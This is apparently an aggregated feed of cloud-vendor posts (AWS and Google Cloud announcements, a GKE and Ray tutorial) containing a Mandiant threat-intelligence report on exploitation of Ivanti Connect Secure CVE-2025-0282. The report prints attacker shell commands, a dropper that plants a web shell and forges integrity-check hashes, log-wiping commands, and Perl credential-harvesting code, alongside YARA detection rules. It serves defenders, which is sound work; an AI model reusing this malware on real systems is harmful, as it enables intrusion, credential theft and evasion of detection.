For more information on the over 145 Direct Connect locations worldwide, visit the locations section of the Direct Connect product detail pages. Or, visit our getting started page to learn more about how to purchase and deploy Direct Connect.
Amazon SageMaker, a fully managed machine learning service, announces the general availability of Amazon Q Developer in SageMaker Studio Code Editor. SageMaker Studio customers now get generative AI assistance powered by Q Developer right within their Code Editor (Visual Studio Code – Open Source) IDE. With Q Developer, data scientists and ML engineers can access expert guidance on SageMaker features, code generation, and troubleshooting. This allows for more productivity by eliminating the need for tedious online searches and documentation review, and ensuring more time delivering differentiated business value.
Data scientists and ML engineers using Code Editor in SageMaker Studio can kick off their model development lifecycle with Amazon Q Developer. They can use the chat capability to discover and learn how to leverage SageMaker features for their use case without having to sift through extensive documentation. As well, users can generate code tailored to their needs and jump-start the development process. Further, they can use Q Developer to get in-line code suggestions and conversational assistance to edit, explain, and document their code in Code Editor. Users can also leverage Q Developer to receive step by step guidance for troubleshooting when running into errors. This integration empowers data scientists and ML engineers to accelerate their workflow, enhance productivity, and deliver ML models more efficiently, streamlining the machine learning development process.
This feature is available in all commercial AWS regions where SageMaker Studio is available.
The exponential growth of machine learning models brings with it ever-increasing datasets. This data deluge creates a significant bottleneck in the Machine Learning Operations (MLOps) lifecycle, as traditional data preprocessing methods struggle to scale. The preprocessing phase, which is critical for transforming raw data into a format suitable for model training, can become a major roadblock to productivity.
To address this challenge, in this article, we propose a distributed data preprocessing pipeline that leverages the power of Google Kubernetes Engine (GKE), a managed Kubernetes service, and Ray, a distributed computing framework for scaling Python applications. This combination allows us to efficiently preprocess large datasets, handle complex transformations, and accelerate the overall ML workflow.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3eaa72b0d460>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
The data preprocessing imperative
The data preprocessing phase in MLOps is foundational, directly impacting the quality and performance of machine learning models. Preprocessing includes tasks such as data cleaning, feature engineering, scaling, and encoding, all of which are essential for ensuring that models learn effectively from the data.
When data preprocessing requires a large number of operations, it may cause bottlenecks slowing down the overall speed at which the data is processed. In the following example, we walk through a preprocessing dataset use case that includes uploading several images to a Google Cloud Storage bucket. This involves up to 140,000 operations that, when executed serially, create a bottleneck and take over 8 hours to complete.
Dataset For this example, we use a pre-crawled dataset consisting of 20,000 products.
Data preprocessing steps The dataset has 15 different columns. The columns of our interest are: ‘uniq_id’, ‘product_name’, ‘description’, ‘brand’ ,‘product_category_tree’, ‘image’ ,‘product_specifications’.
Besides dropping null values and duplicates, we perform the following steps on the relevant columns:
description: Clean up Product Description by removing stop words and punctuation.
product_category_tree: Split into different columns.
product_specifications: Parse the Product Specifications into Key:Value pairs.
image: Parse the list of image urls. Validate the URL and download the image.
Now, consider the scenario where a preprocessing task involves extracting multiple image URLs from each row of a large dataset and uploading the images to a Cloud Storage bucket. This might sound straightforward, but with a dataset that contains 20,000+ rows, each with potentially up to seven URLs, the process can become incredibly time-consuming when executed serially in Python. In our experience, such a task can take upwards of eight hours to complete!
Solution: Implement parallelism for scalability
To tackle this scalability issue, we turn to parallelism. By breaking the dataset into smaller chunks and distributing the processing across multiple threads, we can drastically reduce the overall execution time. We chose to use Ray as our distributed computing platform.
Ray: Distributed computing simplified
Ray is a powerful framework designed for scaling Python applications and libraries. It provides a simple API for distributing computations across multiple workers, making it a strong choice for implementing parallel data preprocessing pipelines.
In our specific use case, we leverage Ray to distribute the Python function responsible for downloading images from URLs to Cloud Storage buckets across multiple Ray workers. Ray’s abstraction layer handles the complexities of worker management and communication, allowing us to focus on the core preprocessing logic.
Ray’s core capabilities include:
Task parallelism: Ray enables arbitrary functions to be executed asynchronously as tasks on separate Python workers, providing a straightforward way to parallelize our image download process.
Actor model: Ray’s “actors” offer a way to encapsulate stateful computations, making them suitable for complex preprocessing scenarios where shared state might be necessary.
Simplified scaling: Ray seamlessly scales from a single machine to a full-blown cluster, making it a flexible solution for varying data sizes and computational needs.
Implementation details
We ran the data preprocessing on GKE using the accelerated platforms repository, which provides the code to build your GKE cluster and configure pre-requisites like running Ray on the cluster so you can run data preprocessing on the cluster as a container. The job consisted of three phases:
1. Dataset partitioning: We divide the large dataset into smaller chunks.
The 20,000 rows of input data were divided into 101 smaller chunks, each with 199 rows. Each chunk is assigned to a Ray task, which is executed on a Ray worker.
2. Ray task distribution: We created Ray remote tasks. Ray creates and manages the workers and distributes the task onto them.
3. Parallel data processing: The Ray tasks prepare the data and download the images to Cloud Storage concurrently.
Results
By leveraging Ray and GKE, we achieved a dramatic reduction in processing time. The preprocessing time for 20,000 rows decreased from over 8 hours to just 17 minutes, representing a speedup of approximately 23x. If the data size increases, you can adjust the batch size and use Ray autoscaling to achieve similar performance.
Data preprocessing challenges no more
Distributed data preprocessing with GKE and Ray provides a robust and scalable solution for addressing the data preprocessing challenges faced by modern ML teams. By leveraging the power of parallelism and cloud infrastructure, we can accelerate data preparation, reduce bottlenecks, and empower data scientists and ML engineers to focus on model development and innovation. To learn more, run the deployment that demonstrates this data preprocessing use case using Ray on GKE cluster.
To help close this gender gap, we are opening up applications for the Google for Startups Accelerator: Women Founders program for Europe & Israel. This ten-week accelerator is designed to support Seed to Series A women-led AI startups with expert mentorship, technical support, and tailored workshops that lay the groundwork for scaling.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3eaa72e83190>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Fostering a more inclusive AI ecosystem
As AI continues to revolutionize industries, ensuring that diverse voices lead the way is critical for driving innovation that benefits everyone. The Google for Startups Accelerator: Women Founders program is working to level the playing field, empowering women-led startups to bring fresh, diverse perspectives to the future of AI.
Margaryta Sivakova, the CEO of Legal Nodes, leveraged support from the program to scale her business:“Through Google for Startups Accelerator, we learned to build, improve, and scale AI solutions, focusing on production-grade AI, MLOps, and the right infrastructure for rapid scaling.”
Maria Terzi, the CEO of Malloc Privacy, received one-on-one support to help users protect their data on their phones:“We joined Google for Startups Accelerator to enhance our technology and gained much more—insights on pricing, sales, UI/UX design, people management, and fast-paced operations.”
Apply now
Women-led startups building with AI in Europe and Israel can apply until January 24 for the 2025 cohort of the Google for Startups Accelerator: Women Founders program.
Written by: John Wolfram, Josh Murchie, Matt Lin, Daniel Ainsworth, Robert Wallace, Dimiter Andonov, Dhanesh Kizhakkinan, Jacob Thompson
Note: This is a developing campaign under active analysis by Mandiant and Ivanti. We will continue to add more indicators, detections, and information to this blog post as needed.
On Wednesday, Jan. 8, 2025, Ivanti disclosed two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, impacting Ivanti Connect Secure (“ICS”) VPN appliances. Mandiant has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. CVE-2025-0282 is an unauthenticated stack-based buffer overflow. Successful exploitation could result in unauthenticated remote code execution, leading to potential downstream compromise of a victim network.
Ivanti and its affected customers identified the compromise based on indications from the company-supplied Integrity Checker Tool (“ICT”) along with other commercial security monitoring tools. Ivanti has been working closely with Mandiant, affected customers, government partners, and security vendors to address these issues. As a result of their investigation, Ivanti has released patches for the vulnerabilities exploited in this campaign and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible.
Mandiant is currently performing analysis of multiple compromised Ivanti Connect Secure appliances from multiple organizations. The activity described in this blog utilizes insights collectively derived from analysis of these infected devices and have not yet conclusively tied all of the activity described below to a single actor. In at least one of the appliances undergoing analysis, Mandiant observed the deployment of the previously observed SPAWN ecosystem of malware (which includes the SPAWNANT installer, SPAWNMOLE tunneler and the SPAWNSNAIL SSH backdoor). The deployment of theSPAWN ecosystem of malware following the targeting of Ivanti Secure Connect appliances has been attributed to UNC5337, a cluster of activity assessed with moderate confidence to be part of UNC5221, which is further described in theAttribution section.
Mandiant has also identified previously unobserved malware families from additional compromised appliances, tracked as DRYHOOK and PHASEJAM that are currently not yet linked to a known group.
It is possible that multiple actors are responsible for the creation and deployment of these various code families (i.e. SPAWN, DRYHOOK and PHASEJAM), but as of publishing this report, we don’t have enough data to accurately assess the number of threat actors targeting CVE-2025-0282. As additional insights are gathered, Mandiant will continue to update this blog post.
Exploitation
While CVE-2025-0282 affects multiple patch levels of ICS release 22.7R2, successful exploitation is version specific. Prior to exploitation, repeated requests to the appliance have been observed, likely to determine the version prior to attempting exploitation.
Version detection has been observed using the Host Checker Launcher, shown above, and the different client installers to determine the version of the appliance. HTTP requests from VPS providers or Tor networks to these URLs, especially in sequential version order, may indicate pre-exploitation reconnaissance.
While there are several variations during the exploitation of CVE-2025-0282, the exploit and script generally performs the following steps:
Disable SELinux
Prevent syslog forwarding
Remount the drive as read-write
Write the script
Execute the script
Deploy one or more web shells
Use sed to remove specific log entries from the debug and application logs
Reenable SELinux
Remount the drive
Immediately after exploitation the threat actor disables SELinux, uses iptables to block syslog forwarding, and remounts the root partition to enable writing of malware to the appliance.
setenforce 0
iptables -A OUTPUT -p udp --dport 514 -j DROP
iptables -A OUTPUT -p tcp --dport 514 -j DROP
iptables -A OUTPUT -p udp --dport 6514 -j DROP
iptables -A OUTPUT -p tcp --dport 6514 -j DROP
mount -o remount,rw /
Malware Staging
Mandiant observed the threat actor using the shell script to echo a Base64-encoded script into the /tmp/.t, and then set execution permissions on the file. The figure below shows the contents of /tmp/.t.
Next, the threat actor writes a Base-64 encoded ELF binary into /tmp/svb. The ELF binary first uses setuid to set the owner of the process to root. It then executes /tmp/s (PHASEJAM) which would inherit the root privileges of the parent process. The threat actor then uses dd to overwrite the svb file with zeros, and removes /tmp/.t.
PHASEJAM is a dropper written as a bash shell script that maliciously modifies Ivanti Connect Secure appliance components. The primary functions of PHASEJAM are to insert a web shell into the getComponent.cgi and restAuth.cgi files, block system upgrades by modifying the DSUpgrade.pm file, and overwrite the remotedebug executable so that it can be used to execute arbitrary commands when a specific parameter is passed.
Web Shell
PHASEJAM inserts the web shell into the legitimate files getComponent.cgi and restAuth.cgi as a function named AccessAllow(). The web shell is Perl-based and provides the threat actor with remote access and code execution capabilities on the compromised ICS server. It utilizes the MIME::Base64 module to encode and decode commands and data.
The table below summarizes the web shell’s functionality, accessible via specific commands derived from HTTP query parameters:
Command
Description
1
Decodes the code provided in the HTTP_CODE environment variable and writes the result into a file named test.p under the /tmp directory. Executes the file using /bin/bash and returns the output of the command execution to the attacker.
2
Similar to command 1 but executes the provided commands using /home/bin/dsrunpriv and the patched remotedebug file.
3
Writes a file with a name specified in the HTTP_CODE environment variable under the /tmp directory with content provided in the License parameter. This functionality allows the attacker to upload arbitrary files on the compromised appliance.
4
Reads the content of a file specified in the Base64-decoded HTTP_CODE environment variable and returns the content to the attacker. This enables the attacker to exfiltrate data from the affected appliance.
5
Similar to command 3 but overwrites the target file instead of appending to it, in case it already exists on the appliance.
Blocked and Simulated Upgrades
To intercept upgrade attempts and simulate an upgrade, PHASEJAM injects a malicious function into the /home/perl/DSUpgrade.pm file named processUpgradeDisplay(). The functionality is intended to simulate an upgrading process that involves thirteen steps, with each of those taking a predefined amount of time. If the ICS administrator attempts an upgrade, the function displays a visually-convincing upgrade process that shows each of the steps along with various numbers of dots to mimic a running process. Further details are provided in the System Upgrade Persistence section.
remotedebug Hooking
PHASEJAM renames the file /home/bin/remotedebug to remotedebug.bak. PHASEJAM writes a new /home/bin/remotedebug shell script to hook calls to remotedebug. The brief shell script checks for a new -c parameter that allows remote code execution by the web shell. All other parameters are passed through to remotedebug.bak.
The following provides an abridged PHASEJAM Sample:
# create backdoor 1
cp /home/webserver/htdocs/dana-na/jam/getComponent.cgi
/home/webserver/htdocs/dana-na/jam/getComponent.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/jam/getComponent.cgi
sh=$(echo CnN1YiB...QogICAK|base64 -d)
up=$(echo CnN1YiB...xuIjsKCn0K |base64 -d)
grep -q 'sub AccessAllow()' || echo "$sh" >>
/home/webserver/htdocs/dana-na/jam/getComponent.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/jam/getComponent.cgi
/home/etc/manifest/manifest -a |grep
-oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/webserver/htdocs/dana-na/jam/getComponent.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# create backdoor 2
cp /home/webserver/htdocs/dana-na/auth/restAuth.cgi
/home/webserver/htdocs/dana-na/auth/restAuth.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/auth/restAuth.cgi
grep -q 'sub AccessAllow()' echo "$sh" >>
/home/webserver/htdocs/dana-na/auth/restAuth.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/auth/restAuth.cgi
/home/etc/manifest/manifest -a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl
dgst -sha256 /home/webserver/htdocs/dana-na/auth/restAuth.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# remotedebug
cp -f /home/bin/remotedebug /home/bin/remotedebug.bak
echo IyEvYmluL2Jhc2gKaWYgWyAiJDEiID09ICItYyIgXTsgdGhlbgoJYm
FzaCAiJEAiCmVsc2UKCWV4ZWMgL2hvbWUvYmluL3JlbW90ZWRlYnV
nLmJhayAiJEAiCmZpICAK|base64 -d >/home/bin/remotedebug
chmod 777 /home/bin/remotedebug.bak
sed -i "s/$(grep /home/bin/remotedebug /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/bin/remotedebug |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
# upgrade
cp -f /home/perl/DSUpgrade.pm /home/perl/DSUpgrade.pm.bak
sed -i 's/popen(*FH, $prog);/processUpgradeDisplay($prog,
$console, $html);return 0;popen(*FH, $prog);/g'
/home/perl/DSUpgrade.pm
grep -q 'sub processUpgradeDisplay()' || echo "$up" >>
/home/perl/DSUpgrade.pm
sed -i "s/$(grep /home/perl/DSUpgrade.pm /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
pkill cgi-server
Anti-Forensics
Following exploitation, the threat actor has been observed removing evidence of exploitation from several key areas of the appliance:
Clearing kernel messages using dmesg and removing entries from the debug logs that are generated during the exploit
Deleting troubleshoot information packages (state dumps) and any core dumps generated from process crashes
Removing log application event log entries related to syslog failures, internal ICT failures, crash traces, and certificate handling errors
Removing executed commands from the SELinux audit log
dmesg -C
cd /data/var/dlogs/
sed -i '/segfault/d' debuglog
sed -i '/segfault/d' debuglog.old
sed -i '/SystemError/d' debuglog
sed -i '/SystemError/d' debuglog.old
sed -i '/ifttls/d' debuglog
sed -i '/ifttls/d' debuglog.old
sed -i '/main.cc/d' debuglog
sed -i '/main.cc/d' debuglog.old
sed -i '/SSL_read/d' debuglog
sed -i '/SSL_read/d' debuglog.old
sed -i '/tlsconnectionpoint/d' debuglog
sed -i '/tlsconnectionpoint/d' debuglog.old
rm -rf /data/var/statedumps/*
rm -rf /data/var/cores/*
cd /home/runtime/logs
sed -i 's/[^x00]{1}x00[^x00]*web server[^x00]*x00//g' log.events.vc0
sed -i 's/[^x00]{1}x00[^x00]*AUT24604[^x00]*x00//g' log.events.vc0
sed -i 's/[^x00]{1}x00[^x00]*SYS31048[^x00]*x00//g' log.events.vc0
sed -i 's/[^x01]{1}x01[^x01]*SYS31376[^x01]*x01//g' log.events.vc0
sed -i 's/x01[^x01]{2,3}6[^x01]*ERR10073[^xff]*x09[^x01]{1}x01/
x01/g' log.events.vc0
cd /data/var/log/audit/
sed -i '/bin/web/d' audit.log
sed -i '/setenforce/d' audit.log
sed -i '/mount/d' audit.log
sed -i '/bin/rm/d' audit.log
System Upgrade Persistence
Mandiant identified two techniques the threat actor employed to persist across system upgrades on compromised Ivanti Connect Secure appliances.
Fake System Upgrades
The first technique, utilized by PHASEJAM, prevents legitimate ICS system upgrade attempts by administrators via rendering a fake HTML upgrade progress bar while silently blocking the legitimate upgrade process. Due to the blocked upgrade attempt, the technique would allow any installed backdoors or tools left by the threat actor to persist on the current running version of the VPN while giving the appearance of a successful upgrade.
First, the threat actor uses sed to insert a malicious Perl code into DSUpgrade.pm to modify the behavior of the system upgrade process. The malicious processUpgradeDisplay() function, which is stored in the shell variable $up, is appended to DSUpgrade.pm.
The modification occurs within a function in DSUpgrade.pm responsible for installing the new upgrade package. The inserted call to processUpgradeDisplay() with the early return makes the legitimate popen() call to execute /pkg/dspkginstall unreachable. The following provides the relevant excerpt from DSUpgrade.pm as a result of the modification.
local *FH;
my $prog = "/pkg/dspkginstall /var/tmp/new-pack.tgz";
if (defined $useUpgradePartition && $useUpgradePartition == 1) {
$prog = "/pkg/dspkginstall /data/upgrade/new-pack.tgz";
}
processUpgradeDisplay($prog, $console, $html);
return 0;
popen(*FH, $prog);
The modification intercepts the standard upgrade flow by calling the maliciously created processUpgradeDisplay() function before the legitimate upgrade command executes. The figure below provides an excerpt of the inserted processUpgradeDisplay() function that displays a fake HTML upgrade progress bar, using the sleep command to add dots every second to mimic a running process.
Recent versions of Ivanti Connect Secure have a built-in integrity checker tool (ICT) that periodically scans the file system to detect new or modified system files that may be indicative of system compromise. The ICT uses a manifest during its scanning process,containing a list of the expected file paths on the system along with its expected SHA256 hash. In an attempt to circumvent the ICT scanner, the threat actor recalculates the SHA256 hash of the modified DSUpgrade.pm and inserts it into the manifest.
sed -i "s/$(grep /home/perl/DSUpgrade.pm
/home/etc/manifest/manifest -a |grep -oE
'[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
The threat actor copies the VERSION file from the mounted upgrade partition (tmp/root/home/VERSION) to the current version partition (/home/VERSION). As a result, the system falsely indicates a successful upgrade while continuing to run on the old appliance version.
SPAWNANT and its supporting components can persist across system upgrades. It hijacks the execution flow of dspkginstall, a binary used during the system upgrade process, by exporting a malicious snprintf function containing the persistence mechanism.
Unlike the first method described in this blog post for system upgrade persistence, SPAWNANT does not block the upgrade process. It survives the upgrade process by ensuring itself and its components are migrated to the new upgrade partition (mounted on /tmp/data/ during a legitimate system upgrade process).
SPAWNANT sets the LD_PRELOAD environment variable to itself (libupgrade.so) within DSUpgrade.pm on the upgrade partition. The modification tells the dynamic linker to load libupgrade.so and use SPAWNANT’s malicious exported snprintf function before other libraries.
ENV{“LD_PRELOAD”} = “libupgrade.so”
Next, SPAWNANT establishes an additional method of backdoor access by writing a web shell into compcheckresult.cgi on the upgrade partition. The web shell uses system() to execute the value passed to a hard-coded query parameter. The following provides the relevant excerpt of the inserted web shell.
Throughout this entire process, SPAWNANT is careful to circumvent the ICT by recalculating the SHA256 hash for any maliciously modified files. Once the appropriate modifications are complete, SPAWNANT generates a new RSA key pair to sign the modified manifest.
After establishing an initial foothold on an appliance, Mandiant observed a number of different tunnelers, including the use of publicly-available and open-source tunnelers, designed to facilitate communication channels between the compromised appliance and the threat actor’s command and control infrastructure. These tunnelers allowed the attacker to bypass network security controls and may enable lateral movement further into a victim environment.
SPAWNMOLE
Originally reported in Cutting Edge, Part 4, SPAWNMOLE is a tunneler injected into the web process. It hijacks the accept function in the web process to monitor traffic and filter out malicious traffic originating from the attacker. SPAWNMOLE is activated when it detects a specific series of magic bytes. Otherwise, the remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer.
LDAP Queries
The threat actor used several tools to perform internal network reconnaissance. This includes using built-in tools included on the ICS appliance such as nmap and dig to determine what can be accessed from the appliance. The threat actor has also been observed using the LDAP service account, if configured, from the ICS appliance to perform LDAP queries. The LDAP service account was also observed being used to move laterally within the network, including Active Directory servers, through SMB or RDP. The observed attacker commands were prefaced by the following lines:
LDAP queries were executed using /tmp/lmdbcerr, with output directed to randomly named files in the /tmp directory. Password, host, and query were passed as command line arguments.
Mandiant has observed the threat actor archiving the database cache on a compromised appliance and staging the archived data in a directory served by the public-facing web server to enable exfiltration of the database. The database cache may contain information associated with VPN sessions, session cookies, API keys, certificates, and credential material.
The threat actor archives the contents of /runtime/mtmp/lmdb. The resulting tar archive is then renamed and masquerades itself as a CSS file located within /home/webserver/htdocs/dana-na/css/.
Ivanti has previously published guidance on remediating the risk that may result from the database cache dump. This includes resetting local account credentials, resetting API keys, and revoking certificates.
Credential Harvesting
Mandiant has observed the threat actor deploying a Python script, tracked as DRYHOOK, to steal credentials. The malware is designed to modify a system component named DSAuth.pm that belongs to the Ivanti Connect Secure environment in order to harvest successful authentications.
Upon execution, the malicious Python script opens /home/perl/DSAuth.pm and reads its content in a buffer. Next, the malware uses regular expressions to find and replace the following lines of code:
The *setPrompt value above is replaced with the following Perl code:
# *setPrompt
$ds_g="";
sub setPrompt{
eval{
my $res=@_[1]."=".@_[2]."n";
$ds_g .= $res;
};
return DSAuthc::RealmSignin_setPrompt(@_);
}
$ds_e="";
The injected setPrompt routine captures the second and the third parameter, combines them into the format <param2>=<param3> and then assigns the produced string to a global variable named $ds_g. The next replacement, shown as follows, reveals that the second parameter is a username, and the third parameter is the password of a user trying to authenticate.
# *runSignin = *DSAuthc::RealmSignin_runSignin;
$ds_g1="";
sub encode_base64 ($;$)
{
my $res = "";
my $eol = $_[1];
$eol = "n" unless defined $eol;
pos($_[0]) = 0; # ensure start at the beginning
$res = join '', map( pack('u',$_)=~ /^.(S*)/, ($_[0]=~/(.{1,45})/gs));
$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 - length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/'=' x $padding/e if $padding;
return $res;
}
sub runSignin{
my $res=DSAuthc::RealmSignin_runSignin(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e1="";
The code above contains two subroutines named encode_base64 and runSignin. The former takes a string and Base64 encodes it, while the latter intercepts the sign-in process and upon a successful attempt serializes the saved credentials into the global variable $ds_g username and password in a file named cmdmmap.kuwMW under the /tmp directory. The <username>=<password> string is first RC4 encrypted with a hard-coded key and then Base64 encoded with the encode_base64 routine before being saved into the cmdmmap.kuwMW file.
The last code replacement is shown as follows, and it is the same code as above, but it targets a different sign-in scheme that is named EBSL in the code.
# *runSigninEBSL
$ds_g2="";
sub runSigninEBSL{
my $res=DSAuthc::RealmSignin_runSigninEBSL(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
use Crypt::RC4;
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e2="";
After the changes are made, the malware attempts to write the modified content back to the DSAuth.pm file, and if unsuccessful, it will remount the file system as readwrite, write the file, and then mount the file system as readonly again. Finally, all instances of the cgi-server process are killed in order for the modified DSAuth.pm to be activated.
Attribution
Mandiant has previously only observed the deployment of the SPAWN ecosystem of malware on Ivanti Connect Secure appliances by UNC5337. UNC5337 is a China-nexus cluster of espionage activity including operations that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024 and most recently as Dec. 2024. This included the Jan 2024 exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) to compromise Ivanti Connect Secure appliances. UNC5337 then leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is part of UNC5221.
UNC5221 is a suspected China-nexus espionage actor that exploited vulnerabilities CVE-2023-46805 and CVE-2024-21887, which impacted Ivanti Connect Secure VPN and Ivanti Policy Security appliances as early as December 2023. Following the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection), UNC5221 leveraged multiple custom malware families, including the ZIPLINE passive backdoor, THINSPOOL dropper, LIGHTWIRE web shell, and WARPWIRE credential harvester. UNC5221 was also observed leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity. Additionally, Mandiant previously observed UNC5221 leveraging a likely ORB network of compromised Cyberoam appliances to enable intrusion operations.
Conclusion
Following the Jan. 10, 2024, disclosure of CVE-2023-46805 and CVE-2024-21887, Mandiant observed widespread exploitation by UNC5221 targeting Ivanti Connect Secure appliances across a wide range of countries and verticals. Mandiant assesses that defenders should be prepared for widespread, opportunistic exploitation, likely targeting credentials and the deployment of web shells to provide future access. Additionally, if proof-of-concept exploits for CVE-2025-0282 are created and released, Mandiant assesses it is likely additional threat actors may attempt targeting Ivanti Connect Secure appliances.
Recommendations
Ivanti recommends utilizing their external and internal Integrity Checker Tool (“ICT”) and to contact Ivanti Support if suspicious activity is identified. While Mandiant has observed threat actor attempts to evade detection by the ICT, the following screenshots provide examples of how a successful scan should appear versus an unsuccessful scan on a device that has been compromised. Note the number of steps reported by the output.
Ivanti also notes that the ICT is a snapshot of the current state of the appliance and cannot necessarily detect threat actor activity if they have returned the appliance to a clean state. The ICT does not scan for malware or other Indicators of Compromise. Ivanti recommends that customers should run the ICT in conjunction with other security monitoring tools which have detected post-exploitation activity.
If the ICT result shows signs of compromise, Ivanti recommends a factory reset on the appliance to ensure any malware is removed and to then place the appliance back into production using version 22.7R2.5.
Acknowledgement
We would like to thank the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a publicly available GTI Collection.
rule M_APT_Installer_SPAWNSNAIL_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNSNAIL. SPAWNSNAIL is an SSH
backdoor targeting Ivanti devices. It has an ability to inject a specified
binary to other process, running local SSH backdoor when injected to
dsmdm process, as well as injecting additional malware to dslogserver"
md5 = "e7d24813535f74187db31d4114f607a1"
strings:
$priv = "PRIVATE KEY-----" ascii fullword
$key1 = "%d/id_ed25519" ascii fullword
$key2 = "%d/id_ecdsa" ascii fullword
$key3 = "%d/id_rsa" ascii fullword
$sl1 = "[selinux] enforce" ascii fullword
$sl2 = "DSVersion::getReleaseStr()" ascii fullword
$ssh1 = "ssh_set_server_callbacks" ascii fullword
$ssh2 = "ssh_handle_key_exchange" ascii fullword
$ssh3 = "ssh_add_set_channel_callbacks" ascii fullword
$ssh4 = "ssh_channel_close" ascii fullword
condition:
uint32(0) == 0x464c457f and $priv and any of ($key*)
and any of ($sl*) and any of ($ssh*)
}
rule M_APT_Installer_SPAWNANT_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNANT. SPAWNANT is an
Installer targeting Ivanti devices. Its purpose is to persistently
install other malware from the SPAWN family (SPAWNSNAIL,
SPAWNMOLE) as well as drop additional webshells on the box."
strings:
$s1 = "dspkginstall" ascii fullword
$s2 = "vsnprintf" ascii fullword
$s3 = "bom_files" ascii fullword
$s4 = "do-install" ascii
$s5 = "ld.so.preload" ascii
$s6 = "LD_PRELOAD" ascii
$s7 = "scanner.py" ascii
condition:
uint32(0) == 0x464c457f and 5 of ($s*)
}
rule M_APT_Tunneler_SPAWNMOLE_1
{
meta:
author = "Mandiant"
description = "Detects a specific comparisons in SPAWNMOLE
tunneler, which allow malware to filter put its own traffic .
SPAWNMOLE is a tunneler written in C and compiled as an ELF32
executable. The sample is capable of hijacking a process on the
compromised system with a specific name and hooking into its
communication capabilities in order to create a proxy server for
tunneling traffic."
md5 = "4f79c70cce4207d0ad57a339a9c7f43c"
strings:
/*
3C 16 cmp al, 16h
74 14 jz short loc_5655C038
0F B6 45 C1 movzx eax, [ebp+var_3F]
3C 03 cmp al, 3
74 0C jz short loc_5655C038
0F B6 45 C5 movzx eax, [ebp+var_3B]
3C 01 cmp al, 1
0F 85 ED 00 00 00 jnz loc_5655C125
*/
$comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2]
3C 01 0F 85 }
/*
81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h
0F 85 CD 00 00 00 jnz loc_5655C128
81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h
0F 85 C0 00 00 00 jnz loc_5655C128
*/
$comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3
1B 0F 85}
condition:
uint32(0) == 0x464c457f and all of them
}
AWS announces general availability of 20 additional AWS Systems Manager Automation runbook recommendations as contextual action buttons on event notifications in AWS Chatbot. This launch enables customers to run AWS Systems Manager automations from Microsoft Teams and Slack channels to address AWS Security Hub and Amazon ECS-related events.
